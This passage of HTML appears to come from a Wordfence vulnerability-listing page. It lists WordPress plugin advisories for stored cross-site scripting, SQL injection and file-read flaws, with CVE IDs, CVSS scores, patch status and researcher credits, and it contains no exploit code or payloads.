<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61947" target="_blank" rel="noopener noreferrer">							CVE-2026-61947						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/form-vibes" target="_blank" rel="noopener">Form Vibes – Save Contact Form 7 &amp; Elementor Form Entries to Database</a> <span class="wfvr-software-slug">[form-vibes]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d1f39a6f73f4287f8e67a2fe1f852ba7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1f39a6f73f4287f8e67a2fe1f852ba7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener">hhhai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b4e61162-dba8-4cb8-b953-031b963de208" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/90e39398-19d7-435d-b23f-e93b8cdbcae4" target="_blank" rel="noopener">Kali Forms &lt;= 2.4.18 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;digitalSignature&#8217; Field Value</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15395" target="_blank" rel="noopener noreferrer">							CVE-2026-15395						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">Kali Forms — Contact Form &amp; Drag-and-Drop Builder</a> <span class="wfvr-software-slug">[kali-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/90e39398-19d7-435d-b23f-e93b8cdbcae4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1c19520b-531a-48d8-acfd-fc35bf860bc2" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System – Bookly &lt;= 27.7 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61944" target="_blank" rel="noopener noreferrer">							CVE-2026-61944						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System – Bookly</a> <span class="wfvr-software-slug">[bookly-responsive-appointment-booking-tool]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ickogz" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/44769af46c8bd00c2681a3f31dbe1e45.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="44769af46c8bd00c2681a3f31dbe1e45"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ickogz" target="_blank" rel="noopener">ickogz</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1c19520b-531a-48d8-acfd-fc35bf860bc2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/848b9c6d-e0db-43ad-ac6d-3674435339dd" target="_blank" rel="noopener">RPB Chessboard &lt;= 8.1.2 &#8211; Unauthenticated Stored Cross-Site Scripting via Comment Content</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13042" target="_blank" rel="noopener noreferrer">							CVE-2026-13042						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rpb-chessboard" target="_blank" rel="noopener">RPB Chessboard</a> <span class="wfvr-software-slug">[rpb-chessboard]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/848b9c6d-e0db-43ad-ac6d-3674435339dd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5fd449d7-d14e-46d6-851c-828207c3c302" target="_blank" rel="noopener">Sprout Clients – CRM and Lead Management &lt;= 3.2.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57428" target="_blank" rel="noopener noreferrer">							CVE-2026-57428						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sprout-clients" target="_blank" rel="noopener">Sprout Clients – CRM and Lead Management</a> <span class="wfvr-software-slug">[sprout-clients]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5fd449d7-d14e-46d6-851c-828207c3c302" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f4daf910-1768-4cfd-af92-66a2ee7f52a5" target="_blank" rel="noopener">Ultimate Auction Pro &lt;= 2.4.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4110" target="_blank" rel="noopener noreferrer">							CVE-2026-4110						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-woocommerce-auction-pro" target="_blank" rel="noopener">Ultimate Auction Pro</a> <span class="wfvr-software-slug">[ultimate-woocommerce-auction-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kacper-rybczynski" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/72f3392477c128c582adb81190a31749.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="72f3392477c128c582adb81190a31749"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kacper-rybczynski" target="_blank" rel="noopener">Kacper Rybczyński</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f4daf910-1768-4cfd-af92-66a2ee7f52a5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d2e0fc0-072b-4640-b538-61356fefa0d8" target="_blank" rel="noopener">Ultimate Auction Pro &lt;= 2.4.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4259" target="_blank" rel="noopener noreferrer">							CVE-2026-4259						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-woocommerce-auction-pro" target="_blank" rel="noopener">Ultimate Auction Pro</a> <span class="wfvr-software-slug">[ultimate-woocommerce-auction-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kacper-rybczynski" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/72f3392477c128c582adb81190a31749.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="72f3392477c128c582adb81190a31749"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kacper-rybczynski" target="_blank" rel="noopener">Kacper Rybczyński</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d2e0fc0-072b-4640-b538-61356fefa0d8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c55bf5f5-20d5-4157-94d3-1a330cdc82df" target="_blank" rel="noopener">MultiVendorX &lt;= 5.0.9 &#8211; Authenticated (Store Owner+) SQL Injection via &#8216;order_by&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12941" target="_blank" rel="noopener noreferrer">							CVE-2026-12941						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dc-woocommerce-multi-vendor" target="_blank" rel="noopener">MultiVendorX – WooCommerce Multivendor Marketplace AI Powered Solutions</a> <span class="wfvr-software-slug">[dc-woocommerce-multi-vendor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c55bf5f5-20d5-4157-94d3-1a330cdc82df" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b301c6e-a3c5-4435-9bc9-fab18085fe2d" target="_blank" rel="noopener">pCloud WP Backup &lt;= 2.0.3 &#8211;  Missing Authorization on the &#8216;start_backup&#8217; AJAX Method to Authenticated (Subscriber+) Arbitrary File Read</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14503" target="_blank" rel="noopener noreferrer">							CVE-2026-14503						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pcloud-wp-backup" target="_blank" rel="noopener">pCloud WP Backup</a> <span class="wfvr-software-slug">[pcloud-wp-backup]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/848ff46b2a1d687cc8e2670b302e1548.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="848ff46b2a1d687cc8e2670b302e1548"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener">Civitasmass</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b301c6e-a3c5-4435-9bc9-fab18085fe2d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63fec549-09e0-4d4e-ae41-128ce0669501" target="_blank" rel="noopener">Quiz and Survey Master (QSM) &lt;= 11.2.0 &#8211; Authenticated (Custom+) SQL Injection via &#8216;pages&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13767" target="_blank" rel="noopener noreferrer">							CVE-2026-13767						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</a> <span class="wfvr-software-slug">[quiz-master-next]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63fec549-09e0-4d4e-ae41-128ce0669501" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8113fd51-9e2b-45c4-a17b-b38072da0de9" target="_blank" rel="noopener">Tickera &lt;= 3.6.0.0 &#8211; Authenticated (Staff+) SQL Injection via &#8216;s&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13754" target="_blank" rel="noopener noreferrer">							CVE-2026-13754						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tickera-event-ticketing-system" target="_blank" rel="noopener">Tickera – Sell Tickets &amp; Manage Events</a> <span class="wfvr-software-slug">[tickera-event-ticketing-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8113fd51-9e2b-45c4-a17b-b38072da0de9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8cd603aa-c4d4-488c-b134-6983240c3a18" target="_blank" rel="noopener">Tutor LMS &lt;= 4.0.0 &#8211; Authenticated (Subscriber+) SQL Injection via Stored Quiz Answer Array</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15022" target="_blank" rel="noopener noreferrer">							CVE-2026-15022						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8cd603aa-c4d4-488c-b134-6983240c3a18" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6199b852-3270-4456-934b-68c3ef11b9e5" target="_blank" rel="noopener">Avada Builder &lt;= 3.15.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Module Title</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12536" target="_blank" rel="noopener noreferrer">							CVE-2026-12536						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-builder" target="_blank" rel="noopener">Avada (Fusion) Builder</a> <span class="wfvr-software-slug">[fusion-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zpiotrak" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/94fc87dbe7283f8fbe6b648a50f6c19d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="94fc87dbe7283f8fbe6b648a50f6c19d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zpiotrak" target="_blank" rel="noopener">Zbigniew Piotrak</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6199b852-3270-4456-934b-68c3ef11b9e5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3ec4978-0d51-4ca1-b0cf-81aaa4d43f7b" target="_blank" rel="noopener">ChatHelp &lt;= 3.5.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;number&#8217; and &#8216;group&#8217; Shortcode Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15759" target="_blank" rel="noopener noreferrer">							CVE-2026-15759						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chat-help" target="_blank" rel="noopener">ChatHelp – Click to Chat Button, WooCommerce Chat to Order &amp; Floating Chat Form</a> <span class="wfvr-software-slug">[chat-help]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3ec4978-0d51-4ca1-b0cf-81aaa4d43f7b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
